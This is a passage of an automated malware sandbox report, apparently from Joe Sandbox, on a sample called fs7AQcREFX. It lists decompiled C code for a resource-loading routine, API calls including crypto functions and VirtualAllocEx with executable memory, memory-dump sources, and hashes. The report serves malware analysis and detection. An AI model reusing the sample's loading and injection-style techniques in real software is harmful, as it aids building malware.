                                                                                                                                                                                                                                                                                          • CryptDestroyKey.ADVAPI32(00000000), ref: 0252A34E
                                                                                                                                                                                                                                                                                          • CryptDestroyKey.ADVAPI32(00000000), ref: 0252A358
                                                                                                                                                                                                                                                                                          • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 0252A364
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.719355201.0000000002520000.00000040.00000800.00020000.00000000.sdmp, Offset: 02520000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2520000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Crypt$Context$AcquireDestroyImport$DecryptErrorLastRelease
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 1555285084-0
                                                                                                                                                                                                                                                                                          • Opcode ID: a29918078d8c2f64865fcd98cb153a1075290469360e4a9c607703ac9d42e64f
                                                                                                                                                                                                                                                                                          • Instruction ID: de7a28617a8f4051569ce3f949818d9e6cfd3e2a3d92223d6612ac676ae78909
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a29918078d8c2f64865fcd98cb153a1075290469360e4a9c607703ac9d42e64f
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 84311975A10209EBEB14CF94C988BEE7BB8FB49B05F148518F601B61C0C7B99A84CF65
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 79%
                                                                                                                                                                                                                                                                                          			E000F21A0(CHAR* __ecx, signed int __edx, struct HINSTANCE__* _a4, CHAR* _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                                                                          				char _v8;
                                                                                                                                                                                                                                                                                          				char _v16;
                                                                                                                                                                                                                                                                                          				char* _v20;
                                                                                                                                                                                                                                                                                          				signed int _v24;
                                                                                                                                                                                                                                                                                          				char _v1048;
                                                                                                                                                                                                                                                                                          				struct HRSRC__* _v1052;
                                                                                                                                                                                                                                                                                          				struct HRSRC__* _v1056;
                                                                                                                                                                                                                                                                                          				CHAR* _v1060;
                                                                                                                                                                                                                                                                                          				CHAR* _v1064;
                                                                                                                                                                                                                                                                                          				signed int _v1068;
                                                                                                                                                                                                                                                                                          				char _v1072;
                                                                                                                                                                                                                                                                                          				struct HINSTANCE__* _v1076;
                                                                                                                                                                                                                                                                                          				void* _v1096;
                                                                                                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                                                                                                          				signed int _t61;
                                                                                                                                                                                                                                                                                          				signed int _t62;
                                                                                                                                                                                                                                                                                          				struct HRSRC__* _t65;
                                                                                                                                                                                                                                                                                          				int _t70;
                                                                                                                                                                                                                                                                                          				signed int _t73;
                                                                                                                                                                                                                                                                                          				CHAR* _t74;
                                                                                                                                                                                                                                                                                          				void* _t78;
                                                                                                                                                                                                                                                                                          				void* _t80;
                                                                                                                                                                                                                                                                                          				struct HRSRC__* _t81;
                                                                                                                                                                                                                                                                                          				struct HRSRC__* _t85;
                                                                                                                                                                                                                                                                                          				struct HRSRC__* _t95;
                                                                                                                                                                                                                                                                                          				signed int _t96;
                                                                                                                                                                                                                                                                                          				struct HINSTANCE__* _t101;
                                                                                                                                                                                                                                                                                          				void* _t102;
                                                                                                                                                                                                                                                                                          				struct HRSRC__* _t103;
                                                                                                                                                                                                                                                                                          				struct HRSRC__* _t120;
                                                                                                                                                                                                                                                                                          				void* _t121;
                                                                                                                                                                                                                                                                                          				char* _t122;
                                                                                                                                                                                                                                                                                          				struct HRSRC__* _t124;
                                                                                                                                                                                                                                                                                          				void* _t125;
                                                                                                                                                                                                                                                                                          				struct HRSRC__ _t126;
                                                                                                                                                                                                                                                                                          				signed int _t127;
                                                                                                                                                                                                                                                                                          				int _t128;
                                                                                                                                                                                                                                                                                          				struct HRSRC__* _t129;
                                                                                                                                                                                                                                                                                          				struct HRSRC__* _t130;
                                                                                                                                                                                                                                                                                          				signed int _t131;
                                                                                                                                                                                                                                                                                          				void* _t132;
                                                                                                                                                                                                                                                                                          				char* _t133;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t115 = __edx;
                                                                                                                                                                                                                                                                                          				_t104 = __ecx;
                                                                                                                                                                                                                                                                                          				_push(0xffffffff);
                                                                                                                                                                                                                                                                                          				_push(E0010FBB6);
                                                                                                                                                                                                                                                                                          				_push( *[fs:0x0]);
                                                                                                                                                                                                                                                                                          				_t133 = _t132 - 0x428;
                                                                                                                                                                                                                                                                                          				_t61 =  *0x159060; // 0x1f9a9bdf
                                                                                                                                                                                                                                                                                          				_t62 = _t61 ^ _t131;
                                                                                                                                                                                                                                                                                          				_v24 = _t62;
                                                                                                                                                                                                                                                                                          				_push(_t62);
                                                                                                                                                                                                                                                                                          				 *[fs:0x0] =  &_v16;
                                                                                                                                                                                                                                                                                          				_v20 = _t133;
                                                                                                                                                                                                                                                                                          				_t101 = _a4;
                                                                                                                                                                                                                                                                                          				_t120 = 0;
                                                                                                                                                                                                                                                                                          				_v1060 = _a8;
                                                                                                                                                                                                                                                                                          				_v1064 = __ecx;
                                                                                                                                                                                                                                                                                          				_t124 = 0;
                                                                                                                                                                                                                                                                                          				_v1056 = 0;
                                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                                          				_v1068 = __edx;
                                                                                                                                                                                                                                                                                          				_v1072 = 0;
                                                                                                                                                                                                                                                                                          				_v1052 = 0;
                                                                                                                                                                                                                                                                                          				_v8 = 1;
                                                                                                                                                                                                                                                                                          				if(_t101 == 0) {
                                                                                                                                                                                                                                                                                          					L15:
                                                                                                                                                                                                                                                                                          					if(_v1052 !=  &_v1048) {
                                                                                                                                                                                                                                                                                          						E000FD040( &_v1052);
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					if(_t120 != _t124) {
                                                                                                                                                                                                                                                                                          						while(1) {
                                                                                                                                                                                                                                                                                          							_t126 = _t120->i;
                                                                                                                                                                                                                                                                                          							_v1056 = _t126;
                                                                                                                                                                                                                                                                                          							E00105DE2(_t120);
                                                                                                                                                                                                                                                                                          							_t133 =  &(_t133[4]);
                                                                                                                                                                                                                                                                                          							if(_t126 == 0) {
                                                                                                                                                                                                                                                                                          								goto L21;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							_t120 = _v1056;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					L21:
                                                                                                                                                                                                                                                                                          					_t65 = 0x8007000e;
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					_t70 = lstrlenW(_t101);
                                                                                                                                                                                                                                                                                          					asm("cdq");
                                                                                                                                                                                                                                                                                          					_t127 = _t70 + 1;
                                                                                                                                                                                                                                                                                          					_t115 = (_t115 << 0x00000020 | _t127) << 1;
                                                                                                                                                                                                                                                                                          					_t128 = _t127 + _t127;
                                                                                                                                                                                                                                                                                          					_t73 = _t128 + 0x80000000;
                                                                                                                                                                                                                                                                                          					asm("adc edx, edi");
                                                                                                                                                                                                                                                                                          					_v1076 = _t115;
                                                                                                                                                                                                                                                                                          					if(_t73 != 0 || _t73 > 0xffffffff) {
                                                                                                                                                                                                                                                                                          						L12:
                                                                                                                                                                                                                                                                                          						_t74 = 0;
                                                                                                                                                                                                                                                                                          						__eflags = 0;
                                                                                                                                                                                                                                                                                          						goto L13;
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						if(_t128 > 0x400) {
                                                                                                                                                                                                                                                                                          							L6:
                                                                                                                                                                                                                                                                                          							__eflags = (_t73 | 0xffffffff) - _t128 - 8;
                                                                                                                                                                                                                                                                                          							if((_t73 | 0xffffffff) - _t128 < 8) {
                                                                                                                                                                                                                                                                                          								goto L32;
                                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                                          								_t20 = _t128 + 8; // 0x9
                                                                                                                                                                                                                                                                                          								_t95 = E00105E1C(_t115, _t120, _t128, _t20);
                                                                                                                                                                                                                                                                                          								_t133 =  &(_t133[4]);
                                                                                                                                                                                                                                                                                          								__eflags = _t95;
                                                                                                                                                                                                                                                                                          								if(_t95 == 0) {
                                                                                                                                                                                                                                                                                          									goto L12;
                                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                                          									 *_t95 = 0;
                                                                                                                                                                                                                                                                                          									_v1056 = _t95;
                                                                                                                                                                                                                                                                                          									_t22 = _t95 + 8; // 0x8
                                                                                                                                                                                                                                                                                          									_t122 = _t22;
                                                                                                                                                                                                                                                                                          									goto L9;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								goto L13;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                                          							_t73 = E000F1030(_t104, _t115, _t128);
                                                                                                                                                                                                                                                                                          							_t133 =  &(_t133[4]);
                                                                                                                                                                                                                                                                                          							if(_t73 == 0) {
                                                                                                                                                                                                                                                                                          								goto L6;
                                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                                          								E0010ACA0(_t128);
                                                                                                                                                                                                                                                                                          								_v20 = _t133;
                                                                                                                                                                                                                                                                                          								_t122 = _t133;
                                                                                                                                                                                                                                                                                          								L9:
                                                                                                                                                                                                                                                                                          								if(_t122 == 0) {
                                                                                                                                                                                                                                                                                          									_t120 = _v1056;
                                                                                                                                                                                                                                                                                          									goto L12;
                                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                                          									 *_t122 = 0;
                                                                                                                                                                                                                                                                                          									_t96 = WideCharToMultiByte(3, 0, _t101, 0xffffffff, _t122, _t128, 0, 0);
                                                                                                                                                                                                                                                                                          									asm("sbb eax, eax");
                                                                                                                                                                                                                                                                                          									_t74 =  ~_t96 & _t122;
                                                                                                                                                                                                                                                                                          									_t120 = _v1056;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								L13:
                                                                                                                                                                                                                                                                                          								if(_t74 != 0) {
                                                                                                                                                                                                                                                                                          									_t101 = LoadLibraryExA(_t74, 0, 2);
                                                                                                                                                                                                                                                                                          									_v1076 = _t101;
                                                                                                                                                                                                                                                                                          									__eflags = _t101;
                                                                                                                                                                                                                                                                                          									if(_t101 != 0) {
                                                                                                                                                                                                                                                                                          										_t115 = _v1064;
                                                                                                                                                                                                                                                                                          										_t129 = FindResourceA(_t101, _v1060, _v1064);
                                                                                                                                                                                                                                                                                          										__eflags = _t129;
                                                                                                                                                                                                                                                                                          										if(_t129 != 0) {
                                                                                                                                                                                                                                                                                          											_t78 = LoadResource(_t101, _t129);
                                                                                                                                                                                                                                                                                          											_v1064 = _t78;
                                                                                                                                                                                                                                                                                          											__eflags = _t78;
                                                                                                                                                                                                                                                                                          											if(_t78 != 0) {
                                                                                                                                                                                                                                                                                          												_t128 = SizeofResource(_t101, _t129);
                                                                                                                                                                                                                                                                                          												_t34 = _t128 + 1; // 0x1
                                                                                                                                                                                                                                                                                          												_t80 = _t34;
                                                                                                                                                                                                                                                                                          												_v1060 = _t128;
                                                                                                                                                                                                                                                                                          												__eflags = _t80 - _t128;
                                                                                                                                                                                                                                                                                          												if(_t80 >= _t128) {
                                                                                                                                                                                                                                                                                          													__eflags = 0;
                                                                                                                                                                                                                                                                                          													_v8 = 2;
                                                                                                                                                                                                                                                                                          													if(0 > 0) {
                                                                                                                                                                                                                                                                                          														L32:
                                                                                                                                                                                                                                                                                          														_push(0x80070216);
                                                                                                                                                                                                                                                                                          														_t80 = E000F1170(_t115);
                                                                                                                                                                                                                                                                                          													} else {
                                                                                                                                                                                                                                                                                          														__eflags = _t80 - 0xffffffff;
                                                                                                                                                                                                                                                                                          														if(_t80 > 0xffffffff) {
                                                                                                                                                                                                                                                                                          															goto L32;
                                                                                                                                                                                                                                                                                          														}
                                                                                                                                                                                                                                                                                          													}
                                                                                                                                                                                                                                                                                          													__eflags = _t80 - 0x400;
                                                                                                                                                                                                                                                                                          													if(__eflags <= 0) {
                                                                                                                                                                                                                                                                                          														_v1052 =  &_v1048;
                                                                                                                                                                                                                                                                                          													} else {
                                                                                                                                                                                                                                                                                          														E000FFF60(_t80, _t115, _t120, _t128, __eflags,  &_v1052);
                                                                                                                                                                                                                                                                                          													}
                                                                                                                                                                                                                                                                                          													_v8 = 1;
                                                                                                                                                                                                                                                                                          													_t81 = _v1052;
                                                                                                                                                                                                                                                                                          													__eflags = _t81;
                                                                                                                                                                                                                                                                                          													if(_t81 != 0) {
                                                                                                                                                                                                                                                                                          														L000F1190(_t128, _v1064, _t128, _t81);
                                                                                                                                                                                                                                                                                          														_t133 =  &(_t133[4]);
                                                                                                                                                                                                                                                                                          														 *((char*)(_v1052 + _t128)) = 0;
                                                                                                                                                                                                                                                                                          														_t85 = E000F3650( &_v1072, _v1052, __eflags, _a12);
                                                                                                                                                                                                                                                                                          														goto L40;
                                                                                                                                                                                                                                                                                          													} else {
                                                                                                                                                                                                                                                                                          														_v1056 = 0x8007000e;
                                                                                                                                                                                                                                                                                          													}
                                                                                                                                                                                                                                                                                          												} else {
                                                                                                                                                                                                                                                                                          													_v1056 = 0x8007000e;
                                                                                                                                                                                                                                                                                          												}
                                                                                                                                                                                                                                                                                          											} else {
                                                                                                                                                                                                                                                                                          												_t85 = E000F13E0();
                                                                                                                                                                                                                                                                                          												goto L40;
                                                                                                                                                                                                                                                                                          											}
                                                                                                                                                                                                                                                                                          										} else {
                                                                                                                                                                                                                                                                                          											_t85 = E000F13E0();
                                                                                                                                                                                                                                                                                          											L40:
                                                                                                                                                                                                                                                                                          											_v1056 = _t85;
                                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                                          										FreeLibrary(_t101);
                                                                                                                                                                                                                                                                                          										_t103 = _v1056;
                                                                                                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                                                                                                          										_t103 = E000F13E0();
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          									_t115 =  &_v1048;
                                                                                                                                                                                                                                                                                          									__eflags = _v1052 -  &_v1048;
                                                                                                                                                                                                                                                                                          									if(_v1052 !=  &_v1048) {
                                                                                                                                                                                                                                                                                          										E000FD040( &_v1052);
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          									__eflags = _t120;
                                                                                                                                                                                                                                                                                          									if(_t120 != 0) {
                                                                                                                                                                                                                                                                                          										while(1) {
                                                                                                                                                                                                                                                                                          											_t130 =  *_t120;
                                                                                                                                                                                                                                                                                          											_v1056 = _t130;
                                                                                                                                                                                                                                                                                          											E00105DE2(_t120);
                                                                                                                                                                                                                                                                                          											_t133 =  &(_t133[4]);
                                                                                                                                                                                                                                                                                          											__eflags = _t130;
                                                                                                                                                                                                                                                                                          											if(_t130 == 0) {
                                                                                                                                                                                                                                                                                          												goto L48;
                                                                                                                                                                                                                                                                                          											}
                                                                                                                                                                                                                                                                                          											_t120 = _v1056;
                                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          									L48:
                                                                                                                                                                                                                                                                                          									_t65 = _t103;
                                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                                          									_t124 = 0;
                                                                                                                                                                                                                                                                                          									goto L15;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				 *[fs:0x0] = _v16;
                                                                                                                                                                                                                                                                                          				_pop(_t121);
                                                                                                                                                                                                                                                                                          				_pop(_t125);
                                                                                                                                                                                                                                                                                          				_pop(_t102);
                                                                                                                                                                                                                                                                                          				return E001059E6(_t65, _t102, _v24 ^ _t131, _t115, _t121, _t125);
                                                                                                                                                                                                                                                                                          			}















































                                                                                                                                                                                                                                                                                          0x000f21a0
                                                                                                                                                                                                                                                                                          0x000f21a0
                                                                                                                                                                                                                                                                                          0x000f21a3
                                                                                                                                                                                                                                                                                          0x000f21a5
                                                                                                                                                                                                                                                                                          0x000f21b0
                                                                                                                                                                                                                                                                                          0x000f21b1
                                                                                                                                                                                                                                                                                          0x000f21b7
                                                                                                                                                                                                                                                                                          0x000f21bc
                                                                                                                                                                                                                                                                                          0x000f21be
                                                                                                                                                                                                                                                                                          0x000f21c4
                                                                                                                                                                                                                                                                                          0x000f21c8
                                                                                                                                                                                                                                                                                          0x000f21ce
                                                                                                                                                                                                                                                                                          0x000f21d4
                                                                                                                                                                                                                                                                                          0x000f21d7
                                                                                                                                                                                                                                                                                          0x000f21d9
                                                                                                                                                                                                                                                                                          0x000f21df
                                                                                                                                                                                                                                                                                          0x000f21e5
                                                                                                                                                                                                                                                                                          0x000f21e7
                                                                                                                                                                                                                                                                                          0x000f21ed
                                                                                                                                                                                                                                                                                          0x000f21f0
                                                                                                                                                                                                                                                                                          0x000f21f6
                                                                                                                                                                                                                                                                                          0x000f21fc
                                                                                                                                                                                                                                                                                          0x000f2202
                                                                                                                                                                                                                                                                                          0x000f2208
                                                                                                                                                                                                                                                                                          0x000f22bf
                                                                                                                                                                                                                                                                                          0x000f22cb
                                                                                                                                                                                                                                                                                          0x000f22d3
                                                                                                                                                                                                                                                                                          0x000f22d3
                                                                                                                                                                                                                                                                                          0x000f22da
                                                                                                                                                                                                                                                                                          0x000f22e6
                                                                                                                                                                                                                                                                                          0x000f22e6
                                                                                                                                                                                                                                                                                          0x000f22e9
                                                                                                                                                                                                                                                                                          0x000f22ef
                                                                                                                                                                                                                                                                                          0x000f22f4
                                                                                                                                                                                                                                                                                          0x000f22f9
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f22e0
                                                                                                                                                                                                                                                                                          0x000f22e0
                                                                                                                                                                                                                                                                                          0x000f22e6
                                                                                                                                                                                                                                                                                          0x000f22fb
                                                                                                                                                                                                                                                                                          0x000f22fb
                                                                                                                                                                                                                                                                                          0x000f220e
                                                                                                                                                                                                                                                                                          0x000f220f
                                                                                                                                                                                                                                                                                          0x000f2216
                                                                                                                                                                                                                                                                                          0x000f2217
                                                                                                                                                                                                                                                                                          0x000f2219
                                                                                                                                                                                                                                                                                          0x000f221d
                                                                                                                                                                                                                                                                                          0x000f2221
                                                                                                                                                                                                                                                                                          0x000f2226
                                                                                                                                                                                                                                                                                          0x000f2228
                                                                                                                                                                                                                                                                                          0x000f222e
                                                                                                                                                                                                                                                                                          0x000f22b7
                                                                                                                                                                                                                                                                                          0x000f22b7
                                                                                                                                                                                                                                                                                          0x000f22b7
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f2239
                                                                                                                                                                                                                                                                                          0x000f223f
                                                                                                                                                                                                                                                                                          0x000f225c
                                                                                                                                                                                                                                                                                          0x000f2261
                                                                                                                                                                                                                                                                                          0x000f2264
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f226a
                                                                                                                                                                                                                                                                                          0x000f226a
                                                                                                                                                                                                                                                                                          0x000f226e
                                                                                                                                                                                                                                                                                          0x000f2273
                                                                                                                                                                                                                                                                                          0x000f2276
                                                                                                                                                                                                                                                                                          0x000f2278
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f227a
                                                                                                                                                                                                                                                                                          0x000f227a
                                                                                                                                                                                                                                                                                          0x000f2280
                                                                                                                                                                                                                                                                                          0x000f2286
                                                                                                                                                                                                                                                                                          0x000f2286
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f2286
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f2278
                                                                                                                                                                                                                                                                                          0x000f2241
                                                                                                                                                                                                                                                                                          0x000f2242
                                                                                                                                                                                                                                                                                          0x000f2247
                                                                                                                                                                                                                                                                                          0x000f224c
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f224e
                                                                                                                                                                                                                                                                                          0x000f2250
                                                                                                                                                                                                                                                                                          0x000f2255
                                                                                                                                                                                                                                                                                          0x000f2258
                                                                                                                                                                                                                                                                                          0x000f2289
                                                                                                                                                                                                                                                                                          0x000f228b
                                                                                                                                                                                                                                                                                          0x000f22b1
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f228d
                                                                                                                                                                                                                                                                                          0x000f229a
                                                                                                                                                                                                                                                                                          0x000f229d
                                                                                                                                                                                                                                                                                          0x000f22a5
                                                                                                                                                                                                                                                                                          0x000f22a7
                                                                                                                                                                                                                                                                                          0x000f22a9
                                                                                                                                                                                                                                                                                          0x000f22a9
                                                                                                                                                                                                                                                                                          0x000f22b9
                                                                                                                                                                                                                                                                                          0x000f22bb
                                                                                                                                                                                                                                                                                          0x000f2310
                                                                                                                                                                                                                                                                                          0x000f2312
                                                                                                                                                                                                                                                                                          0x000f2318
                                                                                                                                                                                                                                                                                          0x000f231a
                                                                                                                                                                                                                                                                                          0x000f2328
                                                                                                                                                                                                                                                                                          0x000f233d
                                                                                                                                                                                                                                                                                          0x000f233f
                                                                                                                                                                                                                                                                                          0x000f2341
                                                                                                                                                                                                                                                                                          0x000f234f
                                                                                                                                                                                                                                                                                          0x000f2355
                                                                                                                                                                                                                                                                                          0x000f235b
                                                                                                                                                                                                                                                                                          0x000f235d
                                                                                                                                                                                                                                                                                          0x000f2371
                                                                                                                                                                                                                                                                                          0x000f2373
                                                                                                                                                                                                                                                                                          0x000f2373
                                                                                                                                                                                                                                                                                          0x000f2376
                                                                                                                                                                                                                                                                                          0x000f237c
                                                                                                                                                                                                                                                                                          0x000f237e
                                                                                                                                                                                                                                                                                          0x000f238f
                                                                                                                                                                                                                                                                                          0x000f2391
                                                                                                                                                                                                                                                                                          0x000f2395
                                                                                                                                                                                                                                                                                          0x000f239c
                                                                                                                                                                                                                                                                                          0x000f239c
                                                                                                                                                                                                                                                                                          0x000f23a1
                                                                                                                                                                                                                                                                                          0x000f2397
                                                                                                                                                                                                                                                                                          0x000f2397
                                                                                                                                                                                                                                                                                          0x000f239a
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f239a
                                                                                                                                                                                                                                                                                          0x000f23a6
                                                                                                                                                                                                                                                                                          0x000f23ab
                                                                                                                                                                                                                                                                                          0x000f23e2
                                                                                                                                                                                                                                                                                          0x000f23ad
                                                                                                                                                                                                                                                                                          0x000f23b4
                                                                                                                                                                                                                                                                                          0x000f23b4
                                                                                                                                                                                                                                                                                          0x000f23e8
                                                                                                                                                                                                                                                                                          0x000f23ef
                                                                                                                                                                                                                                                                                          0x000f23f5
                                                                                                                                                                                                                                                                                          0x000f23f7
                                                                                                                                                                                                                                                                                          0x000f2410
                                                                                                                                                                                                                                                                                          0x000f241e
                                                                                                                                                                                                                                                                                          0x000f2421
                                                                                                                                                                                                                                                                                          0x000f2432
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f23f9
                                                                                                                                                                                                                                                                                          0x000f23f9
                                                                                                                                                                                                                                                                                          0x000f23f9
                                                                                                                                                                                                                                                                                          0x000f2380
                                                                                                                                                                                                                                                                                          0x000f2380
                                                                                                                                                                                                                                                                                          0x000f2380
                                                                                                                                                                                                                                                                                          0x000f235f
                                                                                                                                                                                                                                                                                          0x000f235f
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f235f
                                                                                                                                                                                                                                                                                          0x000f2343
                                                                                                                                                                                                                                                                                          0x000f2343
                                                                                                                                                                                                                                                                                          0x000f2437
                                                                                                                                                                                                                                                                                          0x000f2437
                                                                                                                                                                                                                                                                                          0x000f2437
                                                                                                                                                                                                                                                                                          0x000f243e
                                                                                                                                                                                                                                                                                          0x000f2444
                                                                                                                                                                                                                                                                                          0x000f231c
                                                                                                                                                                                                                                                                                          0x000f2321
                                                                                                                                                                                                                                                                                          0x000f2321
                                                                                                                                                                                                                                                                                          0x000f244a
                                                                                                                                                                                                                                                                                          0x000f2450
                                                                                                                                                                                                                                                                                          0x000f2456
                                                                                                                                                                                                                                                                                          0x000f245e
                                                                                                                                                                                                                                                                                          0x000f245e
                                                                                                                                                                                                                                                                                          0x000f2463
                                                                                                                                                                                                                                                                                          0x000f2465
                                                                                                                                                                                                                                                                                          0x000f2476
                                                                                                                                                                                                                                                                                          0x000f2476
                                                                                                                                                                                                                                                                                          0x000f2479
                                                                                                                                                                                                                                                                                          0x000f247f
                                                                                                                                                                                                                                                                                          0x000f2484
                                                                                                                                                                                                                                                                                          0x000f2487
                                                                                                                                                                                                                                                                                          0x000f2489
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f2470
                                                                                                                                                                                                                                                                                          0x000f2470
                                                                                                                                                                                                                                                                                          0x000f2476
                                                                                                                                                                                                                                                                                          0x000f248b
                                                                                                                                                                                                                                                                                          0x000f248b
                                                                                                                                                                                                                                                                                          0x000f22bd
                                                                                                                                                                                                                                                                                          0x000f22bd
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f22bd
                                                                                                                                                                                                                                                                                          0x000f22bb
                                                                                                                                                                                                                                                                                          0x000f224c
                                                                                                                                                                                                                                                                                          0x000f223f
                                                                                                                                                                                                                                                                                          0x000f222e
                                                                                                                                                                                                                                                                                          0x000f2496
                                                                                                                                                                                                                                                                                          0x000f249e
                                                                                                                                                                                                                                                                                          0x000f249f
                                                                                                                                                                                                                                                                                          0x000f24a0
                                                                                                                                                                                                                                                                                          0x000f24ae

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • lstrlenW.KERNEL32(00000000,1F9A9BDF,00000001,00000000,00000000), ref: 000F220F
                                                                                                                                                                                                                                                                                          • _malloc.LIBCMT ref: 000F226E
                                                                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000003,00000000,00000000,000000FF,00000008,00000001,00000000,00000000), ref: 000F229D
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.711567392.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.711475414.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712610122.0000000000159000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712714995.000000000015C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713013679.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713099356.0000000000173000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_f0000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: ByteCharMultiWide_malloclstrlen
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 2576735857-0
                                                                                                                                                                                                                                                                                          • Opcode ID: a3c5f25d2135e6cbfccdfd85dc7ceecb6d6368ca7e68c708e43d505e690a1139
                                                                                                                                                                                                                                                                                          • Instruction ID: af82220ebb5d34967beca900c43d3b58c1204cfc0dee2ed952a900355b505deb
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a3c5f25d2135e6cbfccdfd85dc7ceecb6d6368ca7e68c708e43d505e690a1139
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6D81B5F1D0022C9BCB60DB64CC807EEB7B8AF44710F1081AAEB05A7641D7B49EC59F99
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000040), ref: 02523D2B
                                                                                                                                                                                                                                                                                          • VirtualAllocEx.KERNEL32(00000000,?,00000000,00003000,00000040), ref: 02523D57
                                                                                                                                                                                                                                                                                          • VirtualAllocEx.KERNEL32(00000000,00000000,00000000,00103000,00000040), ref: 02523D77
                                                                                                                                                                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 02523D91
                                                                                                                                                                                                                                                                                          Memory Dump Source
